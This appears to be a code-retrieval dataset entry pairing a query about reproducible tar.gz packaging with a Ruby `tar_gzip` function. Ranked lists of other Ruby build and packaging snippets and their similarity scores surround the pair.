"def package_tarballs( mods_dirs )\n pwd = Dir.pwd\n mods_dirs.each do |module_dir|\n next unless File.directory? module_dir\n FileUtils.chdir module_dir, :verbose => (verbose?)\n\n cmd = \"puppet module build --render-as=json\"\n puts cmd if verbose?\n tgz = `#{cmd}`.split(\"\\n\").last.gsub('\"','')\n puts \"--[tgz] built module archive: #{tgz}\" if verbose?\n FileUtils.cp tgz, @tars_dir, :verbose => verbose?\n end\n FileUtils.chdir pwd, :verbose => verbose?\n end",
"def path_for(package)\n \"#{package.path}.metadata.json\"\n end",
"def dmg_package_source\n if %i(direct repo).include?(new_resource.source)\n return package_metadata[:url]\n end\n path = new_resource.source.to_s\n (path.start_with?('/') ? 'file://' : '') + path\n end",
"def bundle_directory\n @yaml[\"paths\"][\"bundle_directory\"]\n end",
"def package_download_url\n package_filename_url_safe = Info.release_version.gsub(\"+\", \"%2B\")\n \"https://#{Info.release_bucket}.#{Info.release_bucket_s3_endpoint}/ubuntu-focal/#{Info.package}_#{package_filename_url_safe}_amd64.deb\"\n end",
"def install_dir # :nodoc:\n File.join Gem.dir, 'bundler', 'gems', \"#{@name}-#{dir_shortref}\"\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def build_dist_path(item)\n sub_build_dir = File.join(@config.build_dir, item.name)\n return Dir[File.join(sub_build_dir, \"#{item.name}-[0-9.]*.tar.gz\")][0]\n end",
"def write_pkg_metadata\n render_template(resource_path(\"gen.manifestfile.erb\"),\n destination: pkg_metadata_file,\n variables: {\n name: safe_base_package_name,\n fmri_package_name: fmri_package_name,\n description: project.description,\n summary: project.friendly_name,\n arch: safe_architecture,\n })\n\n # Append the contents of symlinks_file if it exists\n if symlinks_file\n File.open(pkg_metadata_file, \"a\") do |symlink|\n symlink.write(render_symlinks)\n end\n end\n\n # Print the full contents of the rendered template file to generate package contents\n log.debug(log_key) { \"Rendered Template:\\n\" + File.read(pkg_metadata_file) }\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def config_schema_generation_directory\n FilePath.new(@build_dir, \"generated\", \"config-schema\")\n end",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def default_install_dir\n @install_dir ||= CernerSplunk::PathHelpers.default_install_dirs[package][node['os'].to_sym]\n raise \"Unsupported Combination: #{package} + #{node['os']}\" unless @install_dir\n @install_dir\n end",
"def create_package(type, data)\n begin\n dirpackage = FPM::Package::Dir.new\n dirpackage.attributes[:chdir] = @tmpdir\n dirpackage.input @libdir\n ospackage = dirpackage.convert(FPM::Package.const_get(@package_type))\n params(ospackage, type, data)\n filename = \"mcollective-#{package.metadata[:name].downcase}-#{type}-#{package.metadata[:version]}-#{package.iteration}#{@arch}.#{@package_type.downcase}\"\n\n do_quietly? do\n ospackage.output(filename)\n end\n\n puts \"Successfully built #{@package_type} '#{filename}'\"\n rescue Exception => e\n puts \"Failed to build package mcollective-#{package.metadata[:name].downcase}-#{type}. - #{e}\"\n ensure\n ospackage.cleanup if ospackage\n dirpackage.cleanup if dirpackage\n end\n end",
"def dir\n Rails.root.join(ROOT, type, name).to_s\n end",
"def backupDir\n\t\tdataDir = self.dataDir\n\t\tif (dataDir.nil? || dataDir.empty? || dataDir[\"/var/pgsql\"])\n\t\t\treturn BACKUP_DIR\n\t\tend\n\t\treturn dataDir.sub(/Data\\z/, \"Backup\")\n\tend",
"def build_archive_dir\n out = config_source['build-archive-dir']\n out = nil if (out != nil && out.downcase == 'none')\n out = FilePath.new(out) unless out.nil?\n out\n end",
"def gen_dir(gendir = nil)\n @gen_dir = \"#{gendir}#{gendir.empty? ? '.' : ''}\" if gendir\n @gen_dir\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def pkg_export\n return if @export.count == 0\n\n sysprint \"#{@name} export\"\n\n @export.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def base_export_dir\n \"#{@directory.slug}_files\"\n end",
"def golang_project_dirname\n DeliveryGolang::Helpers.golang_project_dirname(node)\n end",
"def convert_package(pkginfo, packaging_dir,\n gem_name: nil,\n patch_dir: nil\n )\n Packager.info \"Package Ruby: '#{pkginfo.name}' with gem_name: '#{gem_name}'\"\n\n # update dependencies in any case, i.e. independent if package exists or not\n deps = pkginfo.dependencies\n Dir.chdir(pkginfo.srcdir) do\n begin\n logname = \"package-ruby-#{pkginfo.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n logfile = File.join(log_dir, logname)\n\n gem = FileList[\"pkg/*.gem\"].first\n if not gem\n Packager.info \"#{self.class}: preparing gem generation in #{Dir.pwd}\"\n\n # Rake targets that should be tried for cleaning\n gem_clean_success = false\n Gem.clean_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to clean package '#{pkginfo.name}' using target '#{target}' #{msg} (see #{logfile})\"\n File.open(logfile,\"a+\") {|f| f.puts msg }\n else\n Packager.info \"#{self.class}: succeeded to clean package '#{pkginfo.name}' using target '#{target}'\"\n gem_clean_success = true\n break\n end\n end\n if not gem_clean_success\n Packager.warn \"#{self.class}: failed to cleanup ruby package '#{pkginfo.name}' -- continuing without cleanup\"\n end\n\n Packager.info \"#{self.class}: ruby package Manifest.txt is being autogenerated\"\n Package2Gem.generate_manifest_txt\n Package2Gem.cleanup_multiple_gemspec(gem_name)\n\n Packager.info \"#{self.class}: creating gem from package #{pkginfo.name} [#{File.join(log_dir, logname)}]\"\n\n if patch_pkg_dir(pkginfo.name, patch_dir, whitelist: [\"*.gemspec\", \"Rakefile\", \"metadata.yml\"])\n Packager.info \"#{self.class}: patched build files for ruby package before gem building: #{pkginfo.name}\"\n end\n\n # Allowed gem creation alternatives\n gem_creation_success = false\n\n # Gemspec often use the 'git ls -z' listings, which\n # might break if hidden files will be removed\n # without commiting -- so temporarily add and revert\n # again, to maintain the original commit id\n # TBD: or leave the commit and list the last N commits in the changelog\n Packager.info \"#{self.class}: temporarily commit changes in #{Dir.pwd}\"\n _,_,git_add_status = Open3.capture3(\"git add -A\")\n msg,git_commit_status = Open3.capture2(\"git commit -m 'Apaka: gem creation' --author 'Apaka Packager, <apaka@autocommit>'\")\n if !git_commit_status.success?\n Packager.info \"#{self.class}: commit failed: #{msg}\"\n end\n Gem.creation_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to create gem using target '#{target}' (see #{logfile})\"\n File.open(logfile,\"a+\") do |f|\n f.puts msg\n f.puts pkginfo.env\n end\n else\n Packager.info \"#{self.class}: succeeded to create gem using target '#{target}'\"\n gem_creation_success = true\n break\n end\n end\n if git_commit_status.success?\n Packager.info \"#{self.class}: git package status\"\n msg, git_revert = Open3.capture2(\"git reset --soft HEAD~1\")\n Packager.info \"#{self.class}: reversion of temporary commit failed\"\n end\n if not gem_creation_success\n raise RuntimeError, \"Debian: failed to create gem from RubyPackage #{pkginfo.name}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # other packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n 
if gem_name\n gem_name = gem.sub(Packaging.basename(pkginfo.name), gem_name)\n if gem != gem_name\n Packager.info \"#{self.class}: renaming #{gem} to #{gem_name}\"\n end\n else\n gem_name = gem\n end\n Packager.info \"#{self.class}: '#{pkginfo.name}' -- basename: #{Packaging.basename(pkginfo.name)} will be packaged as: #{gem_name}\"\n\n gem_final_path = File.join(packaging_dir, File.basename(gem_name))\n Packager.info \"#{self.class}: copy #{File.join(Dir.pwd, gem)} to #{gem_final_path}\"\n FileUtils.cp gem, gem_final_path\n return gem_final_path\n\n rescue Exception => e\n raise RuntimeError, \"#{self.class}: failed to create gem from RubyPackage #{pkginfo.name} -- #{e.message}\\n#{e.backtrace.drop(1).map{|s| \"\\t#{s}\"}}\"\n end\n end\n end",
"def maintainer\n \"#{@package.maintainer} <#{@package.email}>\"\n end",
"def package_artifact\n # keep track of current working dir\n current_dir = Dir.pwd\n Dir.chdir @configuration.package_destination_path\n\n # zip final package\n cmd = []\n cmd << \"zip\"\n cmd << \"-r\"\n cmd << \"\\\"#{@configuration.zipped_package_name}\\\"\"\n cmd << \"\\\"#{@configuration.dsym_name}\\\"\" unless @configuration.skip_dsym\n cmd << \"\\\"#{@configuration.ipa_name}\\\"\" unless !@configuration.sdk.eql? \"iphoneos\"\n cmd << \"\\\"#{@configuration.app_name}.#{@configuration.app_extension}\\\"\" unless !@configuration.sdk.eql? \"macosx\"\n cmd << \"2>&1 %s ../build.output\" % (@configuration.verbose ? '| tee' : '>')\n\n system cmd.join \" \"\n\n # delete all the artifacts but the .app. which will be needed by the automation builds\n FileUtils.rm_rf @configuration.dsym_name unless !File.exists? @configuration.dsym_name\n FileUtils.rm_rf @configuration.ipa_name unless !File.exists? @configuration.ipa_name\n\n # back to working directory\n Dir.chdir current_dir\n\n puts \"Done\"\n puts \"ZIP package: #{@configuration.zipped_package_name}\"\n end",
"def path_for(package)\n \"#{package.path}.metadata.json\"\n end",
"def distutils\n site_packages(libexec).parent/\"distutils\"\n end",
"def get_setuptools\n\t\tpackage_name = \"python-setuptools\"\n\t\tcase node.platform\n\t\twhen /fedora|redhat|centos|ubuntu/\n\t\t package_name = \"python-setuptools\"\n\t\tend\n\t\tpackage_name\n\tend",
"def context_dir\n File.join(DOTDIR, package)\n end",
"def directory\n File.join(Cfg.rootdir, @category, @suitename, @component, \"binary-#{name}\")\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def installer_path\n %x[which apt-get].chomp\n end",
"def module_root\n metadata_path = find_upwards('metadata.json')\n if metadata_path\n File.dirname(metadata_path)\n else\n nil\n end\n end",
"def os_install_dir\n @os_install_dir\n end",
"def get_dir_name\n return @builder['dir_label'].text\n end",
"def initialize_reprepro_conf_dir(release_prefix)\n if !@reprepro_lock.owned?\n raise ThreadError.new\n end\n \n conf_dir = File.join(deb_repository, release_prefix, \"conf\")\n if File.exist? conf_dir\n Packager.info \"Reprepo repository exists: #{conf_dir}\"\n else\n Packager.info \"Initializing reprepo repository in #{conf_dir}\"\n system(\"sudo\", \"mkdir\", \"-p\", conf_dir, :close_others => true)\n\n user = Etc.getpwuid(Process.uid).name\n Packager.info \"Set owner #{user} for #{deb_repository}\"\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository, :close_others => true)\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository + \"/\", :close_others => true)\n system(\"sudo\", \"chmod\", \"-R\", \"755\", conf_dir, :close_others => true)\n end\n\n distributions_file = File.join(conf_dir, \"distributions\")\n if !File.exist?(distributions_file)\n File.open(distributions_file,\"w\") do |f|\n Config.linux_distribution_releases.each do |release_name, release|\n f.write(\"Codename: #{release_name}\\n\")\n f.write(\"Architectures: #{Config.architectures.keys.join(\" \")} source\\n\")\n f.write(\"Components: main\\n\")\n f.write(\"UDebComponents: main\\n\")\n f.write(\"Tracking: minimal\\n\")\n f.write(\"Contents:\\n\\n\")\n end\n end\n end\n end"
] | [
"0.7038908",
"0.6894775",
"0.6833736",
"0.681512",
"0.6646762",
"0.6568039",
"0.6338617",
"0.63289803",
"0.62737525",
"0.62679255",
"0.6170336",
"0.61601603",
"0.6086764",
"0.5999166",
"0.59521484",
"0.5935174",
"0.5926287",
"0.5916547",
"0.589468",
"0.5887863",
"0.58775705",
"0.58314574",
"0.57975197",
"0.5770237",
"0.57582",
"0.5750014",
"0.57229996",
"0.5694661",
"0.5664136",
"0.56610465",
"0.5647779",
"0.56295735",
"0.56295735",
"0.56033665",
"0.56028044",
"0.55962867",
"0.55579656",
"0.55505985",
"0.55299336",
"0.5511317",
"0.5492833",
"0.5487359",
"0.5479451",
"0.5453905",
"0.5444602",
"0.54424745",
"0.54332757",
"0.5427621",
"0.54265594",
"0.5423723",
"0.5419855",
"0.5417579",
"0.5400831",
"0.53780264",
"0.5377322",
"0.5374782",
"0.536958",
"0.5349062",
"0.5349062",
"0.5338558",
"0.5338155",
"0.53341097",
"0.5323618",
"0.53227645",
"0.53175026",
"0.53087866",
"0.5299336",
"0.5297111",
"0.5292696",
"0.52835226",
"0.52808905",
"0.5280131",
"0.5279975",
"0.5278416",
"0.5266952",
"0.5265795",
"0.52636665",
"0.524771",
"0.52428216",
"0.5241887",
"0.522514",
"0.5215445",
"0.52117306",
"0.5210753",
"0.5209061",
"0.5208421",
"0.52045494",
"0.5204123",
"0.5203926",
"0.519559",
"0.5191847",
"0.5186471",
"0.51678807",
"0.51506686",
"0.5150048",
"0.51236063",
"0.51224077",
"0.51208866",
"0.51186687",
"0.5118599"
] | 0.7265215 | 0 |
A tar gzip version that reproduces the same checksums on the same day when file content does not change. Required to package orig.tar.gz | def tar_gzip(archive, tarfile, pkg_time, distribution = nil,
logfile: nil)
# Make sure no distribution information leaks into the package
if distribution and archive =~ /~#{distribution}/
archive_plain_name = archive.gsub(/~#{distribution}/,"")
FileUtils.cp_r archive, archive_plain_name
else
archive_plain_name = archive
end
Packager.info "Tar archive: #{archive_plain_name} into #{tarfile}"
# Make sure that the tar file's checksum remains the same by
# overriding the modification timestamps in the tarball with
# some external source timestamp and using gzip --no-name
#
# exclude hidden files and directories
mtime = pkg_time.iso8601()
# Exclude hidden files and directories at top level
cmd_tar = "tar --mtime='#{mtime}' --format=gnu -c --exclude '.+' --exclude-backups --exclude-vcs --exclude #{archive_plain_name}/debian --exclude build #{archive_plain_name} | gzip --no-name > #{tarfile}"
if system(cmd_tar, [:out,:err] => redirection(logfile, "a"))
Packager.info "Package: successfully created archive using command '#{cmd_tar}' -- pwd #{Dir.pwd} -- #{Dir.glob("**")}"
checksum = `sha256sum #{tarfile}`
Packager.info "Package: sha256sum: #{checksum}"
return true
else
Packager.info "Package: failed to create archive using command '#{cmd_tar}' -- pwd #{Dir.pwd}"
return false
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def tar_gz_file\n \"#{package_name}.tar.gz\"\n end",
"def get_gzipped_backup\n tar_file = get_tempfile\n safe_run \"tar -czf #{tar_file} #{tar_dir}\"\n tar_file\n end",
"def compress_source_tgz(path)\n tarfile = Tempfile.create([\"vagrant\", \".tar\"])\n tarfile.close\n tarfile = File.open(tarfile.path, \"wb+\")\n tgzfile = Tempfile.create([\"vagrant\", \".tgz\"])\n tgzfile.close\n tgzfile = File.open(tgzfile.path, \"wb\")\n tar = Gem::Package::TarWriter.new(tarfile)\n tgz = Zlib::GzipWriter.new(tgzfile)\n if File.file?(path)\n tar.add_file(File.basename(path), File.stat(path).mode) do |io|\n File.open(path, \"rb\") do |file|\n while bytes = file.read(4096)\n io.write(bytes)\n end\n end\n end\n else\n Dir.glob(File.join(path, \"**/**/*\")).each do |item|\n rel_path = item.sub(path, \"\")\n item_mode = File.stat(item).mode\n\n if File.directory?(item)\n tar.mkdir(rel_path, item_mode)\n else\n tar.add_file(rel_path, item_mode) do |io|\n File.open(item, \"rb\") do |file|\n while bytes = file.read(4096)\n io.write(bytes)\n end\n end\n end\n end\n end\n end\n tar.close\n tarfile.rewind\n while bytes = tarfile.read(4096)\n tgz.write bytes\n end\n tgz.close\n tgzfile.close\n tarfile.close\n File.delete(tarfile.path)\n tgzfile.path\n end",
"def tar_xz_file\n \"#{package_name}.tar.xz\"\n end",
"def prep_command #:nodoc:\n \"tar cvf #{full_tarfile} #{remote_directory}; gzip -f #{full_tarfile}\"\n end",
"def extract_tar_gz\n Gem::Package::TarReader.new(Zlib::GzipReader.open(base.package)) do |tar|\n\n # Progressbar\n progressbar = ProgressBar.create(format: PROGRESSBAR_FORMAT, total: tar.count)\n\n # tar.count move position pointer to end\n tar.rewind\n\n dest_file = nil\n tar.each do |entry|\n if entry.full_name == TAR_LONGLINK\n dest_file = File.join(@tmpdir, entry.read.strip)\n next\n end\n dest_file ||= File.join(@tmpdir, entry.full_name)\n if entry.directory?\n FileUtils.rm_rf(dest_file) unless File.directory?(dest_file)\n FileUtils.mkdir_p(dest_file, mode: entry.header.mode, verbose: false)\n elsif entry.file?\n FileUtils.rm_rf(dest_file) unless File.file?(dest_file)\n File.open(dest_file, 'wb') do |f|\n f.write(entry.read)\n end\n FileUtils.chmod(entry.header.mode, dest_file, verbose: false)\n elsif entry.header.typeflag == '2' # symlink\n File.symlink(entry.header.linkname, dest_file)\n end\n\n dest_file = nil\n progressbar.increment\n end\n end\n end",
"def compress\n @env[:ui].info I18n.t(\"vagrant.actions.general.package.compressing\", :tar_path => tar_path)\n File.open(tar_path, Platform.tar_file_options) do |tar|\n Archive::Tar::Minitar::Output.open(tar) do |output|\n begin\n current_dir = FileUtils.pwd\n\n copy_include_files\n\n FileUtils.cd(@env[\"package.directory\"])\n Dir.glob(File.join(\".\", \"**\", \"*\")).each do |entry|\n Archive::Tar::Minitar.pack_file(entry, output)\n end\n ensure\n FileUtils.cd(current_dir)\n end\n end\n end\n end",
"def tar_compression_flag(path)\n case path\n when /\\.tar\\.bz2$/\n return \"-j\"\n when /\\.tar\\.gz$|\\.tgz$/\n return \"-z\"\n when /\\.tar\\.xz$/\n return \"-J\"\n else\n return nil\n end\n end",
"def tar_bz2_file\n \"#{package_name}.tar.bz2\"\n end",
"def tgz_file\n \"#{package_name}.tgz\"\n end",
"def tar_compression_flag\n case compression\n when :bzip2, \"bzip2\", nil\n \"j\"\n when :gzip, \"gzip\"\n \"z\"\n when :none, \"none\"\n \"\"\n end\n end",
"def tarball\n Dir[\"#{dest}/#{SCOPE}-#{gemspec.name}-#{gemspec.version}.tgz\"].first\n end",
"def untgzp(file, location)\n if file[-7..-1] != \".tar.gz\"\n print \"ERROR: expected a tar.gz file: #{file}\\n\"\n exit\n end\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n sh \"#{tar} --directory #{location} -xf #{file}\"\nend",
"def add_gem_contents\n @tar_writer.add_file \"data.tar.gz\", 0644 do |inner|\n sio = @signer ? StringIO.new : nil\n Zlib::GzipWriter.wrap(sio || inner) do |os|\n\n Gem::Package::TarWriter.new os do |data_tar_writer|\n def data_tar_writer.metadata() @metadata end\n def data_tar_writer.metadata=(metadata) @metadata = metadata end\n\n yield data_tar_writer\n\n @metadata = data_tar_writer.metadata\n end\n end\n\n # if we have a signing key, then sign the data\n # digest and return the signature\n if @signer then\n digest = Gem::Security::OPT[:dgst_algo].digest sio.string\n @data_signature = @signer.sign digest\n inner.write sio.string\n end\n end\n\n self\n end",
"def valid_gzip? archive\n return unless archive\n return unless File.exist? archive\n `tar tf #{archive} >/dev/null`\n $?.exitstatus == 0\nend",
"def tar(path)\n tar_filename = Pathname.new(path).realpath.to_path + '.tar'\n File.open(tar_filename, 'wb') do |tarfile|\n get_files_to_pack(path).each do |file|\n if File.file?(file)\n File.open(file, 'rb') do |f|\n while buffer = f.read(BLOCKSIZE_TO_READ)\n tarfile.write buffer\n end\n end\n else\n tarfile.write file.gsub(path, '')\n end\n end\n end\n\n tar_filename\n\n end",
"def full_tarfile #:nodoc:\n [tar_directory, tarfile].join(\"/\")\n end",
"def untar_file(f, to)\n line(\"tar\", \"-xf {file} -C {path}\").pass(file: f, path: to)\n end",
"def tar(file)\n TarTask.define_task(file)\nend",
"def tar0(otarfile, *src)\n raise \"no file or directory to tar\" if !src || src.length == 0\n Gem::Package::TarWriter.new otarfile do |tar|\n Find.find *src do |f|\n mode = File.stat(f).mode\n if File.directory? f\n tar.mkdir f, mode\n else\n tar.add_file f, mode do |tio|\n File.open f, 'r' do |io|\n tio.write io.read\n end\n end\n end\n end\n end\n end",
"def kubernetes_compressed_file\n \"#{file_cache_path}/kubernetes-#{version}.tar.gz\"\n end",
"def tar_data(verbose)\n shell = SwrShell.new\n @fileutils.su_mkdir_p @config[\"tar_data\"], verbose\n @fileutils.su_du_sh \"#{@datadir}\", verbose\n cmd = \"tar -C #{@datadir} -c . | snzip > #{File.join(@config[\"tar_data\"],\"data.tar.snz\")}\"\n shell.su_execute(cmd,verbose)\n if @datadir == @logdir\n #log and data dirs are the same so creating empty log.tar.gz\n @fileutils.su_mkdir_p \"empty\", verbose\n @fileutils.su_tar \" -C empty \",\" -cf #{File.join(@config[\"tar_data\"],\"log.tar\")}\",\".\", verbose\n @fileutils.su_rm_rf \"empty\", verbose\n elsif @logdir != ''\n cmd = \"tar -C #{@logdir} -c . | snzip > #{File.join(@config[\"tar_data\"],\"log.tar.snz\")}\"\n shell.su_execute(cmd,verbose)\n end\n cmd = \"cd #{@config[\"tar_data\"]}; du -h; sudo touch md5sums.txt; sudo chmod a+rw md5sums.txt; sudo md5sum data.tar* >> md5sums.txt; sudo md5sum log.tar* >> md5sums.txt;\"\n shell.execute(cmd,verbose,true)\n @fileutils.sync verbose\n end",
"def should_unpack_tgz? dir, clobber=nil\n return !directory_has_children?(dir) || clobber == :clobber\n\n end",
"def tar\n Omnibus.which(\"gtar\") ? \"gtar\" : \"tar\"\n end",
"def test_tar\n\tx = \"test_tar\"\n\t@output = @s.archive({ 'files'=> [@test_directory_1_Path], 'format'=>'tar' , 'recurse'=>false } )\n\t#puts @output['archiveFile']\n\t\n\t@testid= 1\n\tTar.open(@output['archiveFile'], File::RDONLY, 0644, Tar::GNU | Tar::VERBOSE) do |tar|\n while tar.read # or 'tar.each do ...'\n #puts tar.pathname\n\t\t\n\t\t\n # tar.print_long_ls\n\n if tar.reg? && tar.pathname!=\"test_directory_1/.DS_Store\" # regular file\n tar.extract_file('test')\n\t\t want = File.read(File.join(@testdir, tar.pathname))\n\t\t puts tar.pathname\n\t\t #asserting bar1,2,3 from tar file is same as original bar1,2,3\n\t\t assert_log( want, File.read('test'), $log, x, @testid)\n end\n end\n\n ##if extract all files\n #tar.extract_all\n end\n\n\n ##for gzip archive\n #Tar.gzopen('foo.tar.gz', ...\n\n ##for bzip2 archive\n #Tar.bzopen('foo.tar.bz2', ...\n \n \n \n end",
"def tar_dist(val)\n Utilities.tar_dist(val)\n end",
"def tar\n @tarreader\n end",
"def cdtargz(cdpath, targzfile, *src)\n raise \"tar.gz file #{targzfile} shouldn't be a directory\" if File.directory? targzfile\n Zlib::GzipWriter.open targzfile do |otarfile|\n cdtar0 cdpath, otarfile, *src\n end\n end",
"def tgz___( directory, filename )\r\n raise StandardError, \"Under investigation\" \r\n got = @ndev.rpc.file_archive( :destination => filename, :source => directory, :compress => true )\r\n end",
"def tarball\n tarfile = StringIO.new(\"\")\n Gem::Package::TarWriter.new(tarfile) do |tar|\n path = \"#{staging_dir}/#{packager.package_name}\"\n name = packager.package_name\n mode = File.stat(path).mode\n\n tar.add_file(name, mode) do |tf|\n File.open(path, \"rb\") do |file|\n tf.write(file.read)\n end\n end\n end\n\n tarfile.rewind\n tarfile\n end",
"def assemble_tgz\n banner \"Assembling #{TAR}...\"\n rm_and_mkdir(DIR)\n \n # gem\n run(\"cp\", [\"-r\", \"#{File.dirname(__FILE__)}/../../lib\", GEM])\n # data\n mkdir(DATA)\n copy = []\n copy << \"Telfile\"\n copy += Dir[\"files*\"]\n copy.sort.each { |i| run(\"cp\", [\"-r\", i, DATA]) }\n # config.sh\n File.open(\"#{DIR}/config\", \"w\") do |f|\n f.puts(\"CONFIG_HOST='#{@options[:host]}'\") \n f.puts(\"CONFIG_RUBY='#{@config.ruby}'\")\n f.puts(\"CONFIG_RUBYGEMS='#{RUBYGEMS}'\") \n end\n # keys\n ssh_key = \"#{ENV[\"HOME\"]}/.ssh/#{PUBKEY}\"\n if File.exists?(ssh_key)\n run(\"cp\", [ssh_key, DIR])\n end\n \n Dir.chdir(File.dirname(DIR)) do\n run(\"tar\", [\"cfpz\", TAR, File.basename(DIR)])\n end\n end",
"def test_verify_package_checksum\n assert_nothing_raised('verify good checksum') { Tpkg::verify_package_checksum(@pkgfile) }\n\n # Add a few characters to the inner checksummed tarball and test that\n # it now fails the checksum verification\n tar = Tpkg::find_tar\n Dir.mktmpdir('workdir') do |workdir|\n system(\"#{tar} -C #{workdir} -xf #{@pkgfile}\") || abort\n File.open(File.join(workdir, 'testpkg-1.0-1', 'tpkg.tar'), 'a') do |file|\n file.write('xxxxxx')\n end\n badpkg = Tempfile.new('tpkgtest')\n system(\"#{tar} -C #{workdir} -cf #{badpkg.path} testpkg-1.0-1\") || abort\n assert_raise(RuntimeError, 'verify bad checksum') { Tpkg::verify_package_checksum(badpkg.path) }\n end\n\n # Confirm that checksum verification also fails on something that isn't a valid package\n puts '#'\n puts '# Errors expected here'\n puts '#'\n boguspkg = Tempfile.new('tpkgtest')\n boguspkg.puts('xxxxxx')\n boguspkg.close\n assert_raise(RuntimeError, NoMethodError, 'verify bogus non-tarball') { Tpkg::verify_package_checksum(boguspkg.path) }\n # And for completeness how about something that is a tarball but not a valid package\n boguspkg2 = Tempfile.new('tpkgtest')\n system(\"#{tar} -cf #{boguspkg2.path} #{boguspkg.path}\")\n assert_raise(RuntimeError, NoMethodError, 'verify bogus tarball') { Tpkg::verify_package_checksum(boguspkg2.path) }\n end",
"def tar_compression_extension\n case compression\n when :bzip2, \"bzip2\", nil\n \".bz2\"\n when :gzip, \"gzip\"\n \".gz\"\n when :none, \"none\"\n \"\"\n end\n end",
"def generate_tar_file(path_to_file)\n tar_path = temp_path(path_to_file)\n command = \"tar --create --format=gnu --preserve-permissions --absolute-names --file=#{tar_path} #{path_to_file}\"\n bash_out(command)\n return tar_path\n end",
"def extract_pack\n io = Zlib::GzipReader.new(DataDragon.data_pack_path.open)\n\n Gem::Package::TarReader.new(io) do |tar|\n tar.each do |tarfile|\n destination_file = (DataDragon.data_unpacked_path + tarfile.full_name)\n\n if tarfile.directory?\n destination_file.mkpath\n else\n destination_directory = destination_file.dirname\n destination_directory.mkpath unless destination_directory.directory?\n destination_file.write(tarfile.read)\n end\n end\n end\n end",
"def add_metadata\n return if @metadata.nil?\n\n @tar_writer.add_file \"metadata.gz\", 0644 do |io|\n begin\n sio = @signer ? StringIO.new : nil\n gzos = Zlib::GzipWriter.new(sio || io)\n gzos.write @metadata\n ensure\n gzos.flush\n gzos.finish\n\n # if we have a signing key, then sign the metadata digest and return\n # the signature\n if @signer then\n digest = Gem::Security::OPT[:dgst_algo].digest sio.string\n @meta_signature = @signer.sign digest\n io.write sio.string\n end\n end\n end\n end",
"def tar_gz(filename, basename)\n # TODO: detect if there's an appropriately-named subdirectory within. If not, then make/cd into it.\n exec_and_return_output_array(\"tar -xvvzf #{filename}\")\n puts basename\n # puts 'filename - without extension'\nend",
"def tar_content_filenames\n `tar tzf #{filename}`.split(\"\\n\")\n end",
